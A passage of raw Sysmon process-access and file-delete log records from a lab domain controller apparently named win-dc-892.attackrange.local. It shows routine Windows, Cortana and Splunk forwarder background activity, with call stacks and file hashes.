e9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.922{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=A18CF0E97323D4D42934DBF9CB5FEEBC,SHA256=C351408BE3DA87AF4248C88717B574B4E053DB2BD8C2520AC90CF2D0923085AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.875{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=FCD47A7A783B81F2D948335766E9E718,SHA256=093EB43943BEB356298238720E052C301DA7E8B5D69CE2C4D1321E1089813554,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.875{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.875{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.781{266CAFBE-669B-6064-7A01-00000000AE01}9125820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 